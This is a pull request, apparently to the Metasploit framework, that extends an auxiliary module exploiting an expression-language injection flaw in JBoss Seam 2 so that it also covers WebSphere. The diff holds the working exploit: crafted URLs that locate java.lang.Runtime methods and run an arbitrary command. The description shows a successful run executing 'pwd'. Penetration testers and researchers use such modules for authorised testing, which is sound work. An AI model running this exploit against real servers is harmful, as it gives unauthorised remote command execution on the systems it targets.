### PR TITLE
Module was updated to support WebSphere AS running seam-2.

### DIFF
--- a/modules/auxiliary/admin/http/jboss_seam_exec.rb
+++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(8080),
-				OptString.new('TARGETURI', [ true 'Target URI', '/seam-booking/home.seam']),
+				OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),
 				OptString.new('CMD', [ true, "The command to execute."])
 			], self.class)
 	end

--- a/modules/auxiliary/admin/http/jboss_seam_exec.rb
+++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb
@@ -18,12 +18,13 @@ class Metasploit3 < Msf::Auxiliary
 					JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
 				4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
 				Language (EL) expressions, which allows remote attackers to execute arbitrary code
-				via a crafted URL.
+				via a crafted URL. This modules is already successfully tested againt IBM WebSphere
+				6.1 running on iSeries.
 
 				NOTE: this is only a vulnerability when the Java Security Manager is not properly
 				configured.
 			},
-			'Author'          => [ 'guerrino di massa' ],
+			'Author'          => [ 'guerrino di massa', 'Cristiano Maruti <cmaruti[at]gmail.com>' ],
 			'License'         => MSF_LICENSE,
 			'References'      =>
 				[
@@ -37,23 +38,22 @@ class Metasploit3 < Msf::Auxiliary
 			[
 				Opt::RPORT(8080),
 				OptString.new('JBOSS_ROOT',[ true, 'JBoss root directory', '/']),
+				OptString.new('URI',[ true, 'Target URI', 'seam-booking/home.seam']),
 				OptString.new('CMD', [ true, "The command to execute."])
 			], self.class)
 	end
 
 	def run
-		jbr = normalize_uri(datastore['JBOSS_ROOT'])
+		jbr = normalize_uri(datastore['JBOSS_ROOT'] + datastore['URI'])
 		cmd_enc = ""
 		cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
 
-		flag_found_one = 0
-		flag_found_two = 0
+		flag_found_one = 255
+		flag_found_two = 255
 
-		uri_part_1 = "seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
+		uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
 		uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
 		uri_part_3 = "].invoke(null),'"
-
-		print_status("Finding getDeclaredMethods() indexes... (0 to 24)")
 
 		25.times do |index|
 			req = jbr + uri_part_1 + index.to_s + "]}"
@@ -66,16 +66,16 @@ class Metasploit3 < Msf::Auxiliary
 
 			if (res.headers['Location'] =~ %r(java.lang.Runtime.exec\%28java.lang.String\%29))
 				flag_found_one = index
-				print_status("Found right index at [" + index.to_s + "]")
+				print_status("Found right index at [" + index.to_s + "] - exec")
 			elsif (res.headers['Location'] =~ %r(java.lang.Runtime\+java.lang.Runtime.getRuntime))
-				print_status("Found right index at [" + index.to_s + "]")
+				print_status("Found right index at [" + index.to_s + "] - getRuntime")
 				flag_found_two = index
 			else
 				print_status("Index [" + index.to_s + "]")
 			end
 		end
 
-		if (flag_found_one > 0 && flag_found_two > 0 )
+		if (flag_found_one != 255 && flag_found_two != 255 )
 			print_status("Target appears VULNERABLE!")
 			print_status("Sending remote command:" + datastore["CMD"])
 

--- a/modules/auxiliary/admin/http/jboss_seam_exec.rb
+++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		jbr = normalize_uri(target_uri.to_s)
+		uri = normalize_uri(target_uri.to_s)
 		cmd_enc = ""
 		cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
 
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
 		uri_part_3 = "].invoke(null),'"
 
 		25.times do |index|
-			req = jbr + uri_part_1 + index.to_s + "]}"
+			req = uri + uri_part_1 + index.to_s + "]}"
 
 			res = send_request_cgi(
 				{
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
 			print_status("Target appears VULNERABLE!")
 			print_status("Sending remote command:" + datastore["CMD"])
 
-			req = jbr + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
+			req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
 
 			res = send_request_cgi(
 				{

--- a/modules/auxiliary/admin/http/jboss_seam_exec.rb
+++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb
@@ -37,14 +37,13 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(8080),
-				OptString.new('JBOSS_ROOT',[ true, 'JBoss root directory', '/']),
-				OptString.new('URI',[ true, 'Target URI', 'seam-booking/home.seam']),
+				OptString.new('TARGETURI', [ true 'Target URI', '/seam-booking/home.seam']),
 				OptString.new('CMD', [ true, "The command to execute."])
 			], self.class)
 	end
 
 	def run
-		jbr = normalize_uri(datastore['JBOSS_ROOT'] + datastore['URI'])
+		jbr = normalize_uri(target_uri.to_s)
 		cmd_enc = ""
 		cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
 


### PR DESCRIPTION
msf auxiliary(jboss_seam_exec) > run

[_] Found right index at [0] - getRuntime
[_] Index [1]
[_] Index [2]
[*] Index [3]
[*] Index [4]
[*] Index [5]
[*] Found right index at [6] - exec
[_] Index [7]
[_] Index [8]
[*] Index [9]
[*] Index [10]
[*] Index [11]
[*] Index [12]
[*] Index [13]
[*] Index [14]
[*] Index [15]
[*] Index [16]
[*] Index [17]
[*] Index [18]
[*] Index [19]
[*] Index [20]
[*] Index [21]
[*] Index [22]
[*] Index [23]
[*] Index [24]
[*] Target appears VULNERABLE!
[_] Sending remote command:pwd
[_] Exploited successfully
[_] Auxiliary module execution completed
